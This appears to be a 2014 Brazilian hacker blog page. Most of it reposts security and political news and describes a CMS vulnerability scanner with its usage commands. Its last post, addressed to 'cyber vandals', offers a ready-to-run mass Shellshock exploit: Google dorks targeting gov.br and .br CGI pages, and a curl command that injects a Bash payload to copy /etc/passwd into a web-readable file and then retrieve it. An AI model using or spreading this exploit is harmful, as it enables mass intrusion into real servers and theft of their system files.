Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

sábado, 25 de outubro de 2014

Introdução Reconhecimento fácil [POI]

Creio que de inicio o que tenha chamado a atenção foi o "POI" como já anunciado aqui no blog temos um projeto de óculos bem similar ao Google Glass mas uma versão digamos 'caseira"
Como tudo possuímos controle sempre queremos algo há mais com nosso pequeno projeto não sera diferente apesar de alguns atrasos pelo fato do visor ter quebrado e o outro ainda não ter chegado o projeto continua forte e todos os posts referentes a ele serão abortados com o marcado (POI)
Bom vamos lá.

O que é reconhecimento facial/biométrico ?

Reconhecimento facial como o próprio nome sugere trata se de um reconhecimento feito através de traços da face sendo eles diversos variando desde características do olho maças do rosto boca cicatrizes etc.
Não são raras cenas em filmes seriados ou ate mesmo em novelas em que o personagem deve colocar o rosto em um leitor para obter acesso a cofres etc atualmente a tecnologia biométrica esta presente em nosso dia a dia.
Sendo ela em algo mais avançado como caixas eletrônicos carros que possuem tecnologias mais avançadas computadores ou ate mesmo celulares com aplicativos próprios para isso essa tecnologia se apresenta em algo muito utilizado no dia a dia porem de forma mais sútil o facebook há algum tempo utiliza essa tecnologia para sugestões de marcações de fotos de amigos.




sexta-feira, 24 de outubro de 2014

BSidesSP Aí Vou EU!

BSidesSP Aí Vou EU! O que é BSidesSP ?  A Co0L BSidesSP é um evento gratuito que faz parte das conferências “Security B-Sides” existentes em mais de 60 cidades de onze países diferentes, que são mini-conferências voltadas para a comunidade. A C0oL BSidesSP pretende oferecer atividades que promovam a segurança da informação e a cultura hacker, com diversas atividades programadas para acontecer simultaneamente, incluindo duas trilhas de palestras técnicas, debates, oficinas e um “Churrascker”. A décima edição da conferência ocorrerá no dia 23 de Novembro de 2014 (domingo), no final de semana anterior a conferência BlackHat Summit São Paulo, a edição brasileira da Black Hat, uma das mais importantes conferências de segurança em todo o mundo.

O que é BSidesSP ?

A Co0L BSidesSP é um evento gratuito que faz parte das conferências “Security B-Sides” existentes em mais de 60 cidades de onze países diferentes, que são mini-conferências voltadas para a comunidade. A C0oL BSidesSP pretende oferecer atividades que promovam a segurança da informação e a cultura hacker, com diversas atividades programadas para acontecer simultaneamente, incluindo duas trilhas de palestras técnicas, debates, oficinas e um “Churrascker”.
A décima edição da conferência ocorrerá no dia 23 de Novembro de 2014 (domingo), no final de semana anterior a conferência BlackHat Summit São Paulo, a edição brasileira da Black Hat, uma das mais importantes conferências de segurança em todo o mundo.
Conseguimos um espaço para divulgar o SCANNER INURLBR  entramos pra categoria do evento chamada de Brazilian Arsenal.

O que é Brazilian Arsenal ? 

O Brazilian Arsenal é um espaço para divulgar os projetos de ferramentas de segurança Open Source desenvolvidas por brasileiros, com objetivo de divulgar estas iniciativas, fomentar o uso destas ferramentas e atrair mais voluntários para estes projetos.
No início cada projeto tem um espaço de até 10 minutos para se apresentar (no ritmo de Lightning Talks). Em seguida, iremos realizar atividades mão na massa, a escolha do mantenedor de cada projeto, que pode incluir um installfest, um laboratório ou mesmo um "hackaton", aonde os presentes são convidados a desenvolver uma feature ou corrigir um bug do projeto.
ref=https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_10/Brazilian_Arsenal 

0xAgenda

A Conferência O Outro Lado - Security BSides São Paulo (Co0L BSidesSP) ocorrerá no domingo, dia 23 de Novembro de 2014, aproveitando o final de semana que antecede a conferência BlackHat Summit São Paulo.
Neste dia teremos várias atividades em paralelo, incluindo:

  • Duas trilhas de palestras técnicas
  • Várias oficinas simultâneas
  • Palestras Relâmpago (Lightning Talks)
  • Diversas competições no Capture The Flag (CTF)
  • Web Security
  • Game of Drones: Competição de robótica amadora
  • Lockpicking
  • Atividades diversas para fortalecer a comunidade, como a Hacker Job Fair e a Brazilian Arsenal
  • A BSidesSP 4 Kids, com atividades para crianças e adolescentes: Oficinas de Lockpicking e de Robótica
  • Área de descompressão, com lojinhas
  • Lojas de hackerspaces
  • Loja do Laboratório de Garagem
  • “Churrascker” gratuito para os presentes.
  • As palestras terão 40 minutos de duração com 10 minutos para perguntas e respostas e para permitir a movimentação do pessoal. As oficinas serão práticas (hands-on), com 1h30 de duração cada uma.


NÃO PERCA INSCREVA-SE 



0xLocal

A Co0L BSidesSP ocorrerá no Domingo, dia 23 de Novembro de 2014, na PUC-SP
Pontifícia Universidade Católica de São Paulo (PUC-SP) - Campus Consolação
Rua Marquês de Paranaguá, 111 - Consolação - São Paulo - SP - 01303-050 - Brasil - Planeta Terra - Via Láctea

0xMAPA

https://www.google.com/maps/place/Pontif%C3%ADcia+Universidade+Cat%C3%B3lica+de+S%C3%A3o+Paulo+-+PUC-SP/@-23.550455,-46.650116,16z/data=!4m2!3m1!1s0x0:0x3c9149ee51ab6cd4?hl=pt-BR

quinta-feira, 23 de outubro de 2014

Pedófilo é condenado após armadilha com menina virtual de dez anos

Australiano é primeiro caso de condenação devido a programa com falsas crianças online, conduzido por ONG holandesa.

Operadores se passavam por meninas filipinas para atrair criminosos (Foto: BBC)

Um australiano se tornou nesta terça-feira (21) o primeiro homem condenado por pedofilia como resultado de uma operação que usou uma armadilha virtual, na qual um funcionário de uma organização de caridade fingiu ser uma menina de dez anos das Filipinas.
Scott Robert Hansen, o australiano acusado, é um criminoso sexual já registrado na polícia. Ele admitiu culpa por três crimes durante uma audiência no Tribunal Distrital de Brisbane, no leste do país.
Hansen admitiu o envio de fotos obscenas dele para a menina virtual, chamada Sweetie (“docinho”, em tradução livre do inglês) e posse de imagens de abuso sexual infantil em seu computador. Por fim, ele reconheceu ter desobedecido as ordens estabelecidas pelas autoridades para criminosos sexuais como ele.
O australiano foi condenado a dois anos de prisão com suspensão dos efeitos da sentença – ou seja, ele só deverá ir para a cadeia se cometer algum crime mo período de condenação.
Além de Hansen, também foram divulgados dados de mil homens que entraram em contato com a criança falsa. Os detalhes deles foram enviados para polícias de 71 países.
Estes homens tinham oferecido dinheiro a Sweetie para que ela realizasse atos sexuais em frente a uma webcam.
Dialógos
A BBC News obteve os registros das conversas entre Hansen e Sweetie. As respostas eram dadas por uma pessoa fingindo ser a menina.
Nas conversas, Hansen perguntou se Sweetie era realmente uma criança e se já tinha visto um homem nu.
O australiano chegou a realizar um ato sexual em frente à webcam de seu computador acreditando que uma menina de nove anos estava assistindo.
A Justiça australiana afirmou que o fato de Sweetie não ser real é irrelevante para a condenação de Hansen, já que "se você acredita que era uma menina de nove anos, então a lei" precisa ser cumprida.
O chefe da operação - realizada pela ONG holandesa Terre des Hommes -, Hans Guyt, afirmou que ele e os colegas na organização sempre esperaram que a informação levantada por eles fosse usada por polícias do mundo para capturar os criminosos.
E acrescentou que a polícia precisa ser mais proativa, pois a única forma "de encontrar estas pessoas é patrulhar a internet".
Uma equipe de quatro pesquisadores da ONG trabalhou no projeto durante dez semanas em 2013, se passando por meninas filipinas em salas de bate-papo na web.
Em algumas ocasiões eles até usavam um avatar computadorizado, que mostraram aos homens pela webcam.
'Pesadelos'
A BBC News conversou com um dos operadores do programa que tiveram contato direto com os pedófilos. Ele pediu que seu nome não fosse divulgado.
"Alguns dos homens com quem interagimos me deram pesadelos, literalmente", disse.
O operador ouvido pela BBC conversou com Scott Hansen.
"Ele era muito direto, em um momento ele pediu para envolver a irmã de oito anos fictícia. Foi muito difícil dormir à noite depois de interagir com alguém como Hansen", afirmou.
O operador está orgulhoso de ter participado de alguma forma na condenação de Hansen, mas gostaria que mais pedófilos fossem condenados.
Durante o período em que o projeto funcionou, dezenas de milhares de homens entraram em contato com a equipe da Terre des Hommes.

FONTE: BBC

quarta-feira, 22 de outubro de 2014

Empresas que empregam Hackers 'White Hat' para previnir roubos de dados

Parece que a cada mês que ouvimos sobre uma grande violação de dados, os nossos números de cartão de crédito e outras informações importantes nas mãos de bandidos.


Empresas que empregam Hackers 'White Hat' para previnir roubos de dados

Agora, mais empresas estão contratando hackers para ajudá-los a proteger seus clientes.
Chris Martinez mostra como esses hackers trabalhar.

Os sistemas de computadores estão sob constante ataque e os bandidos ter marcado algumas grandes vitórias recentemente.
JP Morgan Chase teve 76 milhões de contas violadas, Home Depot 56 milhões e TJ Maxx 45 milhões, juntamente com roubos de dados menores em Target, Nieman Marcus e Dairy Queen.
"As empresas querem ficar fora das manchetes. Eles não querem ser a próxima grande violação de dados ", disse Jay Kaplan, especialista em segurança.

É por isso que investir em suas próprias medidas de segurança elaboradas, mas nem sempre é suficiente. Agora, muitos estão se voltando para hackers para obter ajuda.

Branco hacker de chapéu Anshuman Bhartiya trabalha fora de seu apartamento.
"Alguns dias eu posso encontrar quatro ou cinco questões em um par de horas", disse ele.
Matthew Jakubowski, também um hacker de chapéu branco, trabalha em um laboratório pequeno, recém-criada na empresa de segurança da informação com sede em Chicago, a Trustwave.
"Em vez de nos roubar os dados, estamos dizendo o que somos capazes de acessar e como nos impedir de fazê-lo no futuro", disse ele.

Jakubowski descobre como chapéu preto hackers podem penetrar as defesas de segurança de uma empresa.
"Os testes de penetração é ... aproveitando essas falhas ou buracos ... e depois tentar encontrar os dados confidenciais, como dados do titular do cartão ou informações pessoais", disse Jakubowski.

Ele tem sido muito bem sucedida.
"Ao longo dos últimos cinco anos ou mais, eu tenho sido capaz de, provavelmente, entrar em cerca de 480 sistemas e tenha acesso a esses dados confidenciais", disse ele.
O especialista em segurança Christien Rioux corre Veracode.

"Você precisa pensar como o atacante, se você está indo cada vez para ser mais esperto que eles", disse Rioux.

Kaplan, que dirige SynAck - uma empresa que emprega centenas de hackers de chapéu branco, concorda.
"Eles estão realmente tentando ajudar as empresas a entender o que são os seus problemas e brilhar uma luz sobre essas questões", disse Kaplan.

Mesmo faculdades, como a Universidade de Southern Maine, começaram a dar aulas em como cortar. Eles estão cultivando a próxima geração de especialistas em segurança cibernética.
"A segurança é um problema que nunca vai desaparecer completamente. Mas é uma luta que precisa ser travada. É preciso haver um chapéu branco para cada chapéu preto ", disse Rioux.
As empresas gastam cerca de $ 100 bilhões de dólares em esforços de segurança cibernética agora. Isso deverá crescer para sobre o $ 160 bilhões ao longo dos próximos anos.

FONTE: CBS-CHICAGO

segunda-feira, 20 de outubro de 2014

Could your bank be the next victim of a cyber attack?

Cybercrime risks becoming the next big banking scandal. What can be done to stop it?


Cybercrime risks becoming the next big banking scandal. What can be done to stop it? Ask someone to picture a bank heist, and they are likely to imagine thugs in balaclavas, bursting through glass doors and brandishing weapons, and hostages cowering on the floor. It is a vivid scenario, and one that Hollywood has done plenty to embed, but ask a security chief at a major bank what worries him, and he is more likely to think of a single computer programmer in a dark room hundreds of miles away, or spies at a foreign


Ask someone to picture a bank heist, and they are likely to imagine thugs in balaclavas, bursting through glass doors and brandishing weapons, and hostages cowering on the floor. It is a vivid scenario, and one that Hollywood has done plenty to embed, but ask a security chief at a major bank what worries him, and he is more likely to think of a single computer programmer in a dark room hundreds of miles away, or spies at a foreign intelligence service attempting to tap into its reams of customer information. 
Cy “It’s very inexpensive to launch an attack, [hackers] can build one thing and then use it to attack bank one, bank two, bank three and bank four the same way,” Mr Clancy says. Increasingly, cyberattacks are not the work of amateur coders, but of organised crime and foreign intelligence services, a development that raises the stakes for security agencies and regulators as well as the banks involved. “The financial sector is, of course, part of the critical national infrastructure, and as part of a national security struggle it becomes more of a priority target,” says Brian Lord, a former GCHQ director. “As geopolitical tensions have increased, the threats take on a different dimension… Nation states are going out and collecting whatever information they can.”

bersecurity attacks, so many believe, could be the next big banking scandal. If over-exuberance and risky lending has been the biggest threat to the sector in the last 10 years, the major worry over the next decade is that customers’ sensitive financial data will be compromised on a wide scale, or that hackers could bring down the financial system.
As the banking world, like much of the rest of corporate society, moves towards internet-based services and online data storage, the risk of hostile attackers attempting to infiltrate the system increases. As a result, spending on banks’ cybersecurity is increasing rapidly, even as budget squeezes force bonuses to fall and branches to shut.
Last week, JP Morgan’s chief executive Jamie Dimon pledged to double cybersecurity spending over the next five years, after one of the biggest breaches in banking history saw the records of 83m customers and small businesses at his bank compromised. The JP Morgan attack has drawn special attention in recent weeks. It is far from a one-off.

On any given day, odds are that your bank has had to fend off a cyberattack. Individual troublemakers, activist groups, sophisticated criminal organisations and rogue states are all targeting the world’s biggest financial institutions in an attempt to steal customer data, disrupt services or simply cause havoc.
Cybercrime is forcing companies of all sizes in almost every sector to take stock, but the financial industry’s position at the heart of world economies makes it a particularly attractive target. Attacks are on the increase, as the exponentially rising number of digital connections between banks, customers and third parties presents new weak points for hackers.
“This has always been a focus for banks but the scale of the threat has increased,” says Richard Horne, a cybersecurity partner at PwC. “The financial system is now more vulnerable because of the interconnected networks.”
Not only is hacking a bigger opportunity than ever, it is also cheap, according to Mark Clancy, the chief executive of Soltra, a cross-party collaboration of banks and regulators to automate intelligence sharing.
The same piece of malicious software can be thrown at any number of financial institutions at little cost, multiplying a hacker’s chances of success. In the case of the JP Morgan hack, which occurred over the summer but was only disclosed this month, many of Wall Street’s largest institutions were targeted at the same time, without success.
“It’s very inexpensive to launch an attack, [hackers] can build one thing and then use it to attack bank one, bank two, bank three and bank four the same way,” Mr Clancy says. Increasingly, cyberattacks are not the work of amateur coders, but of organised crime and foreign intelligence services, a development that raises the stakes for security agencies and regulators as well as the banks involved.
“The financial sector is, of course, part of the critical national infrastructure, and as part of a national security struggle it becomes more of a priority target,” says Brian Lord, a former GCHQ director. “As geopolitical tensions have increased, the threats take on a different dimension… Nation states are going out and collecting whatever information they can.”

The JP Morgan attack has been attributed to the Kremlin. Pic: Alamy

The attack on JP Morgan may have been the work of Russia, American officials have privately indicated. Other intrusions, including an attack on HSBC last year that left millions of customers without access to online services, have been blamed on Islamic groups.
A series of “denial of service” attacks, in which systems are so flooded with connections that they are forced to cease operating, hit US banks including Bank of America and Citigroup in 2012, and was subsequently attributed to Iran.
Often the goal of these attacks, unlike with traditional bank infiltrations, is not to steal money, but simply to disrupt financial systems. “It’s considered retaliation, many of these attacks are at such a level that they can only be done by nation states,” says Dr Alastair MacWillson, a former Accenture security director who has advised the World Bank, the European Commission and US and UK governments on cybersecurity, and is now on the advisory board of Parker Fitzgerald, the financial services consultancy.
Given that banks are under almost constant risk of being attacked, what can they do to protect themselves? And do they need to be put under more pressure to protect consumers?
The answer is not a simple one. The biggest banks’ systems are so vast and complicated as to be incomprehensible, a reality that inevitably creates weakspots. The wave of consolidation in the last two decades has seen banks’ systems untidily meshed together, exacerbating the problem. “Many organisations have incredible levels of complexity, and disparate systems if they’ve merged that are basically multiple versions of the same thing, Dr MacWillson says. “The security technology is equally complex, they have never really invested in reducing that complexity.”
One MP who sits on the Commons Treasury Committee responsible for overseeing financial regulation, says many bank systems are “like a pile of spaghetti”. “Although every bank will take security extremely seriously, many of them have extremely old IT,” he warns.
This complexity, according to Dr MacWillson, is an almost insurmountable problem, no matter how much money is thrown at it: “They have bought every bit of security technology out there… but these legacy problems are just too hard to fix.”
If there are always going to be gaps in banks’ armour, how then, can hackers be kept out? Banks are under pressure to improve security, not only due to the threat of a breach hitting their reputation, but also because it can affect their bottom line.
Fines for banks that fail to protect customers have been floated privately by regulators, who continue to see cybersecurity as a major issue. MPshave held recent meetings with officials including those at the Bank of England to discuss cyber vulnerabilities. Regulating banks’ defence mechanisms is no easy task. By the time politicians and regulators have agreed on a system of defence, new forms of attack would make it obsolete.
“The idea that a regulator offer a total specification is a fool’s errand,” says one MP. A security expert talks of cybercriminals working in terms of “seconds, minutes and hours, while banks deal in days, weeks and months”.
How then, do banks and authorities deal with a target that is constantly moving, often faster than the companies? In 2011 and 2013, the BoE conducted two comprehensive cyber resilience exercises, in which Britain’s biggest banks were subjected to simulated attacks from a hostile state.
The conclusion of the latest trial, conducted last November, was that the biggest risk to banks’ cybersecurity systems was a dearth of collaboration between institutions.
“There is no cross-sector infrastructure in place currently for communication to other financial institutions outside the core systemic wholesale and retail firms,” the Bank said in its conclusions.
A recent report from the British Bankers’ Association warned of “an element of lack of awareness and cultural resistance” to co-operation.
This communication breakdown is starting to change. In June, the Bank launched a cybercrime unit, CBEST, that will bring together intelligence from banks, security agencies and the Government to assess the scale of threats, and create bespoke tests to see whether systems are up to scratch.
This is a model being used elsewhere. Soltra, in some ways a US version of CBEST, has been adopted by 45 institutions and is coming to Europe in the coming weeks. Mr Clancy says it has seen “a lot of interest already from the banks and building societies in the UK”.
Other experts warn that information sharing is a double-edged sword. Mr Lord, who spent two decades at GCHQ before moving to the security group PGI, says the more that sensitive data is centralised, the more attractive that system is to a hostile organisation.
“The value [of this] to a hostile actor is potentially greater than the sum of its parts,” he says. And despite the billions being invested and constant attempts from regulators, experts agree that cybercrime is a threat banks will never be fully safe from.
“I think many banks have just said 'we’ll never manage to do this’. People realise that we’ll never have perfect infrastructure, so what’s their alternative?” says Dr MacWillson. These sentiments were shared by Mr Dimon last week, who warned that there is no absolute defence to the type of attack that has hit JP Morgan. “We don’t want to be sitting here saying you will absolutely be protected because it would put you in a false sense of security,” he said.
How seriously banks take cybersecurity, and how much they devote to defences, will depend on whether attacks affect their bottom line.
It is too early to tell whether JP Morgan’s breach has affected the bank, and the world is perhaps still waiting for a scandal that will make customers stand up and take note. But on any given day, it could be just around the corner.

FONTE: http://www.telegraph.co.uk/

sexta-feira, 17 de outubro de 2014

Wikileaks: PSDB prometeu entregar o pré-sal aos norte-americanos.

Wikileaks: PSDB prometeu entregar o pré-sal aos norte-americanos.


Telegrama enviado da embaixada americana para o Departamento de Estado dos Estados Unidos, vazado pelo Wikileaks, denuncia que Serra prometeu entregar o pré-sal às petroleiras do exterior.
“Eles são os profissionais e nós somos os amadores”, teria afirmado Patrícia Padral, diretora da americana Chevron no Brasil, sobre a lei proposta pelo governo. Segundo ela, o tucano José Serra teria prometido mudar as regras se fosse eleito presidente.

“Deixa esses caras (do PT) fazerem o que eles quiserem. As rodadas de licitações não vão acontecer, e aí nós vamos mostrar a todos que o modelo antigo funcionava… E nós mudaremos de volta”, teria dito o pré-candidato.
Nos bastidores, o lobby pelo pré-sal, por Natalia Viana.

“A indústria de petróleo vai conseguir combater a lei do pré-sal?”. Este é o título de um extenso telegrama enviado pelo consulado americano no Rio de Janeiro a Washington em 2 de dezembro do ano passado.

Como ele, outros cinco telegramas a serem publicados hoje pelo WikiLeaks mostram como a missão americana no Brasil tem acompanhado desde os primeiros rumores até a elaboração das regras para a exploração do pré-sal – e como fazem lobby pelos interesses das petroleiras.

Os documento revelam a insatisfação das pretroleiras com a lei de exploração aprovada pelo Congresso – em especial, com o fato de que a Petrobras será a única operadora – e como elas atuaram fortemente no Senado para mudar a lei.

“Eles são os profissionais e nós somos os amadores”, teria afirmado Patrícia Padral, diretora da americana Chevron no Brasil, sobre a lei proposta pelo governo . Segundo ela, o tucano José Serra teria prometido mudar as regras se fosse eleito presidente.
Partilha
Pouco depois das primeiras propostas para a regulação do pré-sal, o consulado do Rio de Janeiro enviou um telegrama confidencial reunindo as impressões de executivos das petroleiras.

O telegrama de 27 de agosto de 2009 mostra que a exclusividade da Petrobras na exploração é vista como um “anátema” pela indústria.
É que, para o pré-sal, o governo brasileiro mudou o sistema de exploração. As exploradoras não terão, como em outros locais, a concessão dos campos de petróleo, sendo “donas” do petróleo por um deteminado tempo. No pré-sal elas terão que seguir um modelo de partilha, entregando pelo menos 30% à União. Além disso, a Petrobras será a operadora exclusiva.

Para a diretora de relações internacionais da Exxon Mobile, Carla Lacerda, a Petrobras terá todo controle sobre a compra de equipamentos, tecnologia e a contratação de pessoal, o que poderia prejudicar os fornecedores americanos.

A diretora de relações governamentais da Chevron, Patrícia Padral, vai mais longe, acusando o governo de fazer uso “político” do modelo.

Outra decisão bastante criticada é a criação da estatal PetroSal para administrar as novas reservas.

Fernando José Cunha, diretor-geral da Petrobras para África, Ásia, e Eurásia, chega a dizer ao representante econômico do consulado que a nova empresa iria acabar minando recursos da Petrobrás. O único fim, para ele, seria político: “O PMDB precisa da sua própria empresa”.

Mesmo com tanta reclamação, o telegrama deixa claro que as empresas americanas querem ficar no Brasil para explorar o pré-sal.
Para a Exxon Mobile, o mercado brasileiro é atraente em especial considerando o acesso cada vez mais limitado às reservas no mundo todo.

“As regras sempre podem mudar depois”, teria afirmado Patrícia Padral, da Chevron.

Combatendo a lei
Essa mesma a postura teria sido transmitida pelo pré-candidtao do PSDB a presidência José Serra, segundo outro telegrama enviado a Washington em 2 de dezembro de 2009.
O telegrama intitulado “A indústria de petróleo vai conseguir combater a lei do pré-sal?” detalha a estratégia de lobby adotada pela indústria no Congresso.

Uma das maiores preocupações dos americanos era que o modelo favorecesse a competição chinesa, já que a empresa estatal da China, poderia oferecer mais lucros ao governo brasileiro.
Patrícia Padral teria reclamado da apatia da oposição: “O PSDB não apareceu neste debate”.

Segundo ela, José Serra se opunha à lei, mas não demonstrava “senso de urgência”. “Deixa esses caras (do PT) fazerem o que eles quiserem. As rodadas de licitações não vão acontecer, e aí nós vamos mostrar a todos que o modelo antigo funcionava… E nós mudaremos de volta”, teria dito o pré-candidato.
O jeito, segundo Padral, era se resignar. “Eles são os profissionais e nós somos os amadores”, teria dito sobre o assessor da presidência Marco Aurelio Garcia e o secretário de comunicação Franklin Martins, grandes articuladores da legislação.

“Com a indústria resignada com a aprovação da lei na Câmara dos Deputados, a estratégia agora é recrutar novos parceiros para trabalhar no Senado, buscando aprovar emendas essenciais na lei, assim como empurrar a decisão para depois das eleições de outubro”, conclui o telegrama do consulado.

Entre os parceiros, o OGX, do empresário Eike Batista, a Federação das Indústrias do Estado de São Paulo (FIESP) e a Confederação Naiconal das Indústrias (CNI).

“Lacerda, da Exxon, disse que a indústria planeja fazer um ‘marcação cerrada’ no Senado, mas, em todos os casos, a Exxon também iria trabalhar por conta própria para fazer lobby”.

Já a Chevron afirmou que o futuro embaixador, Thomas Shannon, poderia ter grande influência nesse debate – e pressionou pela confirmação do seu nome no Congresso americano.
“As empresas vão ter que ser cuidadosas”, conclui o documento. “Diversos contatos no Congresso (brasileiro) avaliam que, ao falar mais abertamente sobre o assunto, as empresas de petróleo estrangeiras correm o risco de galvanizar o sentimento nacionalista sobre o tema e prejudicar a sua causa”.

Fonte: Wikileaks
http://wikileaks.ch/cable/2009/08/09RIODEJANEIRO288.html
http://wikileaks.ch/cable/2009/12/09RIODEJANEIRO369.html

quinta-feira, 16 de outubro de 2014

Ataque redireciona anúncios do YouTube para página com vírus.

Hackers invadiram site governamental da Polônia para ajudar em golpe. Praga instalada realiza 'sequestro' do computador de vítima.

A fabricante japonesa de antivírus Trend Micro revelou nesta terça-feira (14) um ataque que redirecionava usuários do YouTube para uma página com vírus. De acordo com a empresa, hackers adquiriram cotas de publicidade no site de vídeos e veicularam um anúncio para um site governamental da Polônia. Esta página estava sob o controle dos criminosos, e o clique levava a um terceiro endereço contendo um kit de ataque que instala um vírus em sistemas desatualizados. A Trend Micro diz que já notificou o Google.
Segundo a empresa, 95% dos 113 mil afetados pelo ataque residem nos Estados Unidos. Os números se referem a um período de 30 dias. Nem todas as vítimas, porém, vieram da plataforma de vídeos do Google: a campanha publicitária também estava sendo veiculada em outros sites. No YouTube, a Trend Micro observou a presença do anúncio em vídeos com mais de 11 milhões de visualizações.
Os hackers obtiveram o controle da configuração de DNS de um site governamental polonês. Com isso, os golpistas conseguiram controlar o endereço que seria acessado por visitantes do site sem invadi-lo diretamente. Para a Trend Micro, isso serviu para dar um ar de legitimidade ao anúncio que foi veiculado no YouTube.
Antes de chegar ao site, o usuário passava por redirecionamentos de agências de publicidade, o que indica que o espaço publicitário teria sido comprado pelos canais comuns.
Chegando ao destino final do ataque – um site localizado nos Estados Unidos – o navegador era atacado por um kit chamado de "Sweet Orange" (laranja doce, em inglês). Esse código tenta fazer uso de diversas falhas de segurança para instalar um vírus no computador da vítima. De acordo com a Trend Micro, as vulnerabilidades são todas conhecidas. Quem mantém o sistema, navegador e plug-ins atualizados, portanto, não teve o sistema comprometido.
Quem estava vulnerável teve instalado em seu computador um vírus que a Trend Micro chama de Kovter. Essa praga tenta "sequestrar" o computador, impedindo que o mesmo funcione normalmente até que os golpistas recebam um pagamento em dinheiro da vítima para "resgatar" a máquina. A praga, no entanto, não possui funções avançadas de criptografia presentes em outros códigos maliciosos do mesmo tipo, o que facilita sua remoção.
A compra de espaços publicitárias para inserção de peças maliciosas é uma prática conhecida como "malvertising". A investigação da Trend Micro foi realizada pelo pesquisador Joseph Chen, com colaboração de Rhena Inocencio.

segunda-feira, 13 de outubro de 2014

SEANux — Syrian Electronic Army To Release its Own Linux-based Distribution

Lots of Linux distributions are offered free of cost on the Internet by a number of companies, non-commercial organizations and by many individuals as well, and now, the notorious Syrian Electronic Army (SEA) hasannounced their own Linux distribution known as SEANux.
A Linux distribution is a coordinated collection of software consisting of a customized version of the kernel together with hundreds of open source (i.e., free) utilities, installers, programming languages and application programs. Some of the most popular distributions are Fedora (formerly Red Hat), SuSE, Debian, Ubuntu, Kali Linux, Tails OS and Mint Linux.
SEA (Syrian Electronic Army) is the same group of hackers who made the headlines in past year by launching advance phishing attacks against media organisations, usually Western media outlets.


The group is reportedly aligned with president Bashar al-Assad and had purposely targeted social media accounts of a number of high-profile media outlets including The Guardian, The Washington Post, The New York Times, Forbes, CNN, the Financial Times and the AP. They don’t even left Obama, Facebook,Microsoft, eBay and PayPal from being a victim of their Phishing attack.
At this moment, SEA team has not provided any further information regarding their SEANux operating system, but considering their past activities, it’s hard to trust an operating system released by the SEA hackers group.
SEANux slogan says “Power Up.. Your Performance.” Now the question rises that what kind of performance they actually want to point out. Is that Power up your system performance? or Power up your hacking skills? or Power up your Social Engineering tactics? as most of their targets included social media sites. But, at this moment we can only assume, until they release more details on it.
If I talk generally, in our community, i.e. Infosec community, we majorly have three types of Operating System distributions, as follows:
Linux OS for Penetration testing and Hacking - like Backtrack or Kali Linux which comes wrapped with a collection of penetration testing and network monitoring tools used for testing of software privacy and security.
Forensic OS - Operating System which comes with pre-installed digital forensic tools for testing and security purpose.
An Anonymous OS - Operating Systems like Tails which keeps it users tracks clear. Tails provides users' anonymity and privacy, and was reportedly used by the Global surveillance Whistleblower Edward Snowden in discussions with journalists because it includes a range of tools for protecting your data by means of strong encryption.
We are expecting “SEANux” to be a mixture of Tails and Kali Linux, with lots of pre-installed hacking and Privacy tools. But I would doubt about the integrity of this new operating system SEANux - Linux distribution from the SEA, until we get a clean chit from the Infosec community after its release.
It wouldn't be a shock or a surprise if SEANux comes with a few backdoors or some privacy concerning malwares hidden in it. As in 2012, Anonymous groups of hackers released an operating system called ANonymous-OS, which was later found to be as a backdoored Operating System.
So, we recommend you to install this Operating System only on a virtual OS, so that your important credentials and data remains on a safer side.

sábado, 4 de outubro de 2014

CMS Based

CMS Bas3d é um scanner para CMSs, o objetivo desta ferramenta é analisar o alvo e procurar por possíveis vulnerabilidades que tenham sido publicadas pelo 1337day, exploit-db ou cxsecurity.

A ferramenta não faz uma vasta varredura no alvo, apenas pega a "source html" e 'trabalha com o que encontra', sendo assim, se a tool verificar que o alvo roda WordPress 2.8.5, a mesma irá lhe indicar os links das vulnerabilidades/exploits que PODEM funcionar com esta versão do WordPress.

Além de realizar este scan, você também tem a opção de verificar qual CMS esta rodando no alvo.

Abaixo esta a lista de quais CMS estão disponíveis para scan e quais estão disponíveis para verificação:

O scan funciona com as seguintes CMSs:
 -Joomla
 -b2evolution
 -XOOPS
 -Moodle
 -SMF
 -PHP-Nuke
 -WORDPRESS
 -PostNuke
 -VBULLETIN
 -PHPBB
 -MYBB
 -DRUPAL
 -MODx
 -SilverStripe
 -Textpattern
 -Frog
 -AdaptCMS


O identificador de CMSs é capaz de identificar cerca de 40 CMSs diferentes, sendo elas:
 -Joomla
 -AdaptCMS
 -Apache Roller
 -XOOPS
 -Frog
 -openCMS
 -SMF
 -Textpattern
 -Ametys
 -WordPress
 -ATutor
 -eXo Platform
 -vBulletin
 -b2evolution
 -DSpace
 -phpBB
 -Moodle
 -DotCMS
 -MyBB
 -PHP-Nuke
 -Composite C1
 -Drupal
 -PostNuke
 -DotNetNuke
 -MODx
 -SilverStripe
 -mojoPortal
 -phpVibe
 -Umbraco
 -BEdita
 -Chevereto
 -CMSimple
 -CMSimple_XH
 -Concrete
 -Cotonti
 -Directus
 -DokuWiki
 -Dotclear
 -Magento
 -Geeklog
 -Plone

Para utilizar a ferramenta é simples, a baixo esta comandos que vocês podem utilizar:

Scan com o objetivo de encontrar vulnerabilidades:
  perl ./cmsbas3d.pl [website]


Scan para verificar qual CMS esta rodando:
  perl ./cmsbas3d.pl vcms [website]


Atualizar:
  perl ./cmsbas3d.pl update
 
 
Exibir ajuda:
  perl ./cmsbas3d.pl help


Você pode realizar o "download" mais rapidamente 'clonando' o projeto pelo terminal!
  git clone https://github.com/7mm5ll/CMS_Bas3d.git CMS_Bas3d
 

Nota: O script roda apenas no Linux!


Disponível em:
https://github.com/7mm5ll/CMS_Bas3d

terça-feira, 30 de setembro de 2014

SCANNER [ INURL BR ] + [ SHELLSHOCK ] - Exploit em massa



Eae cybers vândalos, a galera que trabalha na área de tecnologia com certeza já ouviu falar na nova vulnerabilidade que saiu "Shellshock". para mais informações sobre a falha clique no link.

 Vamos para o que importa, nossa equipe montou uma linha de comando para ser usando com nosso scanner ( SCANNER INURL BR ) para explorar essa vulnerabilidade em massa.

[ Dorks ]

DORK[0]=> site:gov.br inurl:/cgi-sys/defaultwebpage.cgi
DORK[1]=> site:.br inurl:/cgi-sys/defaultwebpage.cgi


Lista de dorks CGI ( Créditos pela lista "Takedown" )
 http://pastebin.com/7aD2uZR3 

[ 0xComando ]

php inurlbrazil.php --dork 'inurl:/cgi-sys/defaultwebpage.cgi & inurl:defaultwebpage.cgi ext:cgi' -s ../cgi.txt3 --comand-all 'curl -A "() { :;}; /bin/cat /etc/passwd > ~/cgi-sys/inurlbr.txt" http://_TARGET_/cgi-sys/defaultwebpage.cgi;curl http://_TARGET_/cgi-sys/inurlbr.txt'

